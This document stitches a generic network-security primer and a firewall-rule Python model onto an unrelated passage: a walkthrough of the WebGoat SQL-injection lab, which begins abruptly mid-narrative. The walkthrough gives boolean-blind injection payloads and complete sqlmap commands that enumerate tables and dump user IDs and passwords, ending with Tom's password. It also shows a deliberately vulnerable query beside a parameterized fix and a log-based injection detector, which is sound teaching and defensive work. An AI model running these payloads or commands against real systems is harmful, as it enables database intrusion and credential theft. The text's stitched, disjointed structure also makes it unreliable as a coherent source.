Task – 1
Introduction: Understand the basics of network security by learning about different types of network threats and how to implement basic security measures. This task will introduce you to the foundational concepts of securing a small network.
Types of Network Threats
1. Viruses:
   - Definition: Malicious software that attaches itself to a host file or program and spreads when the host is executed.
   - Propagation: Viruses require human action to spread, such as downloading an infected file or executing a malicious attachment.
   - Impact: Can corrupt or delete files, steal personal data, and cause system failures.
2. Worms:
   - Definition: Self-replicating malware that spreads across networks without needing a host file.
   - Propagation: Exploits vulnerabilities in network services and spreads through local or wide-area networks.
   - Impact: Can cause network congestion, overload servers, and allow attackers to install backdoors.
3. Trojans:
   - Definition: Malicious software disguised as legitimate software. Users unknowingly execute the malware.
   - Propagation: Trojans are often spread through downloads or email attachments.
   - Impact: Once installed, they can give attackers control of the system, steal information, or install other malware.
4. Phishing Attacks:
   - Definition: A form of social engineering where attackers trick individuals into providing sensitive information (like passwords or credit card details) by pretending to be legitimate entities.
   - Propagation: Often occurs via email, instant messaging, or fake websites that resemble trusted organizations.
   - Impact: Can result in identity theft, financial loss, or compromise of sensitive data.
Basic Security Concepts
1. Firewalls:
   - Definition: A security system that monitors and controls incoming and outgoing network traffic based on predetermined security rules.
   - Types:
       - Network firewalls: These filter traffic between different networks, such as the internet and an internal network.
       - Host-based firewalls: Installed on individual devices to filter traffic coming into and leaving the device.
   - Purpose: Prevent unauthorized access to or from a network while allowing legitimate communication.
2. Encryption:
   - Definition: The process of converting data into an unreadable format (ciphertext) to prevent unauthorized access.
   - Types:
       - Symmetric encryption: Uses the same key for encryption and decryption.
       - Asymmetric encryption: Uses a pair of public and private keys for encryption and decryption.
   - Purpose: Protects data integrity and confidentiality during storage or transmission.
3. Secure Network Configurations:
   - Definition: Proper setup and management of network devices to minimize vulnerabilities.
   - Elements:
       - Segmentation: Isolating sensitive parts of a network to limit access.
       - Secure Protocols: Using encrypted communication protocols (e.g., HTTPS, SSL/TLS, SSH) to ensure secure data transmission.
       - Regular Patch Management: Keeping network hardware and software up to date to avoid exploitation of vulnerabilities.
   - Purpose: Reduces the attack surface and prevents exploitation of misconfigurations or outdated software.
Understanding these threats and implementing strong security measures like firewalls, encryption, and secure configurations helps in creating a robust network defense strategy.
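As an added example (not part of the task text), the following Python script models how a network firewall applies an ordered rule list: the first matching rule wins, and any traffic no rule covers is denied. The office layout, addresses and ports are constructed assumptions; the first rule is the segmentation idea from the "Secure Network Configurations" item, cutting the guest segment off from the internal LAN.

```python
# Added example: a first-match, default-deny packet filter that models the
# "predetermined security rules" a network firewall enforces. All networks,
# hosts and ports below are constructed for illustration.
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    proto: str             # "tcp", "udp" or "any"
    src: str               # source network in CIDR notation
    dst: str               # destination network in CIDR notation
    dport: Optional[int]   # destination port, None = any port


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    dst: str
    dport: int


# Constructed policy for a small office. Internal LAN hosts (10.0.1.0/24) may
# reach the internal database server 10.0.1.10 on 5432, the local resolver
# 10.0.1.1 on 53/udp and the Internet on 443. The guest Wi-Fi segment
# (10.0.2.0/24) may only reach the Internet on 443 and is isolated from the LAN.
POLICY = [
    Rule("deny",  "any", "10.0.2.0/24", "10.0.1.0/24",  None),  # segmentation: guests never reach the LAN
    Rule("allow", "tcp", "10.0.2.0/24", "0.0.0.0/0",    443),   # guests -> HTTPS anywhere
    Rule("allow", "tcp", "10.0.1.0/24", "10.0.1.10/32", 5432),  # LAN -> database
    Rule("allow", "udp", "10.0.1.0/24", "10.0.1.1/32",  53),    # LAN -> DNS
    Rule("allow", "tcp", "10.0.1.0/24", "0.0.0.0/0",    443),   # LAN -> HTTPS anywhere
]


def matches(rule: Rule, pkt: Packet) -> bool:
    """A rule matches when protocol, both address ranges and the port agree."""
    if rule.proto != "any" and rule.proto != pkt.proto:
        return False
    if ip_address(pkt.src) not in ip_network(rule.src):
        return False
    if ip_address(pkt.dst) not in ip_network(rule.dst):
        return False
    return rule.dport is None or rule.dport == pkt.dport


def evaluate(policy, pkt: Packet):
    """First-match evaluation: returns (action, index of the deciding rule).
    Traffic that matches no rule is dropped, i.e. the policy is default-deny."""
    for index, rule in enumerate(policy):
        if matches(rule, pkt):
            return rule.action, index
    return "deny", None


if __name__ == "__main__":
    for pkt in (Packet("tcp", "10.0.1.20", "10.0.1.10", 5432),   # LAN -> DB
                Packet("tcp", "10.0.2.15", "10.0.1.10", 5432),   # guest -> DB
                Packet("tcp", "10.0.2.15", "93.184.216.34", 443),  # guest -> Internet HTTPS
                Packet("tcp", "10.0.1.20", "93.184.216.34", 80)):  # LAN -> plain HTTP
        print(pkt, "->", evaluate(POLICY, pkt))
```

Rule order is part of the policy: moving the segmentation rule below the guest-to-Internet rule would let guest hosts reach 10.0.1.10 on port 443, because 0.0.0.0/0 also contains the internal range. Real firewalls add connection state tracking and logging on top of this, but the matching logic is the same.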
As both the registration and the login worked fine with the new user, I can assume that the form values I sent over for these two operations were resulting in valid SQL queries.
So what happens if I try to send them again with some attached SQLi test?
newuser' AND '1'='1
From this response I understand that the app is checking whether the username already exists by running the query we provided, so this statement is a valid TRUE statement since the username already exists.
newuser' and '1'='2
Hence this is a valid FALSE statement.
This is all we need to ask the database for all its data, as long as the DB user is allowed to read it.
In lesson #4 we were given a hint on this problem:
AND substring(database_version(),1,1) = '2
By varying the position argument of substring() and the literal value, we can loop through all positions and see what matches. Subsequent character positions of the database values can be found with Burp Intruder, using a sniper attack on the §2§ position with a list such as https://github.com/xmendez/wfuzz/blob/master/wordlist/stress/alphanum_case_extra.txt and checking which request returns a TRUE statement.
The database_version() value is 2.5.0 on my WebGoat install.
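As an added illustration (not WebGoat's own code), the following Python snippet reproduces the "does this username already exist?" check in the two ways it can be written, against a constructed in-memory SQLite table standing in for CHALLENGE_USERS, and feeds it the two inputs used above. The concatenated version answers TRUE and FALSE for them exactly as observed in the lesson; the parameterized version answers FALSE for both, because the driver passes the whole input as one string literal.

```python
# Added example: the registration lookup written with string concatenation
# (the lesson's vulnerable behaviour) next to the parameterized version that
# removes the oracle. Table contents and passwords are constructed placeholders.
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the lesson's CHALLENGE_USERS table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE challenge_users (userid TEXT PRIMARY KEY, password TEXT)")
    conn.executemany(
        "INSERT INTO challenge_users VALUES (?, ?)",
        [("tom", "placeholder-hash"), ("newuser", "placeholder-hash")],
    )
    return conn


def user_exists_vulnerable(conn: sqlite3.Connection, username: str) -> bool:
    """Concatenation: the input becomes part of the SQL grammar, so a quoted
    boolean tail rewrites the WHERE clause and the 'username already exists'
    message turns into a TRUE/FALSE oracle. Kept deliberately unfixed."""
    sql = "SELECT count(*) FROM challenge_users WHERE userid = '" + username + "'"
    return conn.execute(sql).fetchone()[0] > 0


def user_exists_safe(conn: sqlite3.Connection, username: str) -> bool:
    """Bound parameter: the whole input is handed to the engine as one string
    value; quotes, AND and substring() inside it are just characters."""
    sql = "SELECT count(*) FROM challenge_users WHERE userid = ?"
    return conn.execute(sql, (username,)).fetchone()[0] > 0


def compare(username: str):
    """Return (vulnerable answer, safe answer) for one submitted username."""
    conn = make_db()
    try:
        return user_exists_vulnerable(conn, username), user_exists_safe(conn, username)
    finally:
        conn.close()


if __name__ == "__main__":
    # The plain name and the two test inputs from the lesson above.
    for candidate in ("newuser", "newuser' AND '1'='1", "newuser' and '1'='2"):
        print(repr(candidate), "->", compare(candidate))
```

The fix is the bound parameter, not input filtering: the substring() probes fail for the same reason, since nothing the user sends is ever parsed as SQL. A generic "username already exists" message can stay; the oracle existed only because that message was tied to a query the user could shape.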
I then wanted to automate this with sqlmap and see what I could get from the DB.
The simplest way I know to give sqlmap a proper request is to:
1. submit the initial request and get the response for a TRUE statement from the browser;
2. copy them from Burp;
3. use the request as the input file and the response as the string parameter for the TRUE statement in sqlmap.
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads 1
(Screenshot: current DB is PUBLIC, Boolean-based blind SQL injection found)
Let's try to get the table names:
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=10 --technique=B --dbms="HSQLDB" -D PUBLIC --tables --level=5 --risk=3
I would then start by looking at the CHALLENGE_USERS table:
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS --columns --level=5 --risk=3
(Screenshot: sqlmap asking permission to brute force column names with its wordlist, and the result)
And get the table rows; this time I had to lower the number of threads because of the number of errors I was getting with 10 threads on my machine:
sqlmap -r request.txt --string "please try to register with a different username" -p username_reg --threads=1 --technique=B --dbms="HSQLDB" -D PUBLIC -T CHALLENGE_USERS -C userid,password --dump --level=5 --risk=3
(Screenshot: CHALLENGE_USERS table and Tom's password)
Now we have the username and password for Tom and can log in on the lesson login form.
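From the server side, the sqlmap run above is a burst of registration requests from one client, each carrying a quoted boolean tail or a substring() probe in the username_reg parameter. The following Python detector, an added example that is not from the original write-up, scans constructed application log lines (the log format, paths and addresses are assumptions) for those indicators and reports sources that exceed a request threshold or announce themselves with a sqlmap user agent.

```python
# Added example: scan constructed application log lines for the boolean-blind
# injection patterns seen in the lesson and for a burst of them from one source.
# Log format, endpoint paths, addresses and user agents are all constructed.
import re
from collections import Counter
from urllib.parse import unquote

# Indicators of a boolean-based probe, applied to the URL-decoded form value.
INDICATORS = [
    re.compile(r"'\s*(and|or)\s*'", re.IGNORECASE),            # newuser' AND '1'='1
    re.compile(r"\b(substring|substr)\s*\(", re.IGNORECASE),   # character-at-a-time probe
    re.compile(r"\b(database_version|version)\s*\(", re.IGNORECASE),
    re.compile(r"(--|/\*)"),                                   # comment-based truncation
]

# Constructed format: "<timestamp> <client ip> <method> <path> <param>=<value> \"<user agent>\""
LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\w+)=(\S*) "([^"]*)"$')

# Constructed sample log: one normal user, one probing client, one legitimate apostrophe.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z 10.0.0.5 POST /app/register username_reg=alice \"Mozilla/5.0\"",
    "2024-05-01T10:00:02Z 10.0.0.5 POST /app/login username=alice \"Mozilla/5.0\"",
    "2024-05-01T10:00:03Z 10.0.0.9 POST /app/register username_reg=newuser'%20AND%20'1'%3D'1 \"Mozilla/5.0\"",
    "2024-05-01T10:00:04Z 10.0.0.9 POST /app/register username_reg=newuser'%20and%20'1'%3D'2 \"Mozilla/5.0\"",
    "2024-05-01T10:00:05Z 10.0.0.9 POST /app/register username_reg=newuser'%20AND%20substring(database_version(),1,1)%3D'2 \"Mozilla/5.0\"",
    "2024-05-01T10:00:06Z 10.0.0.9 POST /app/register username_reg=newuser'%20AND%20substring(database_version(),1,1)%3D'3 \"sqlmap/1.7\"",
    "2024-05-01T10:00:07Z 10.0.0.12 POST /app/register username_reg=o'brien \"Mozilla/5.0\"",
]


def is_suspicious(value: str) -> bool:
    """True if the decoded form value contains any injection indicator."""
    decoded = unquote(value)
    return any(p.search(decoded) for p in INDICATORS)


def analyze(lines, burst_threshold: int = 3):
    """Return (suspicious request count per source IP, sorted list of flagged IPs).

    A source is flagged when it sent at least burst_threshold suspicious
    requests or used a user agent that starts with 'sqlmap'."""
    per_ip = Counter()
    sqlmap_sources = set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        ip, value, user_agent = m.group(2), m.group(6), m.group(7)
        if is_suspicious(value):
            per_ip[ip] += 1
        if user_agent.lower().startswith("sqlmap"):
            sqlmap_sources.add(ip)
    flagged = sorted(
        ip for ip in set(per_ip) | sqlmap_sources
        if per_ip[ip] >= burst_threshold or ip in sqlmap_sources
    )
    return dict(per_ip), flagged


if __name__ == "__main__":
    counts, flagged = analyze(SAMPLE_LOG)
    print("suspicious requests per source:", counts)
    print("flagged sources:", flagged)
```

The indicator list is deliberately narrow so that a legitimate name such as o'brien is not flagged; in production the per-source count should be computed over a sliding time window and tuned to the application's real parameter names. This is a detection aid only; the parameterized query is what removes the oracle.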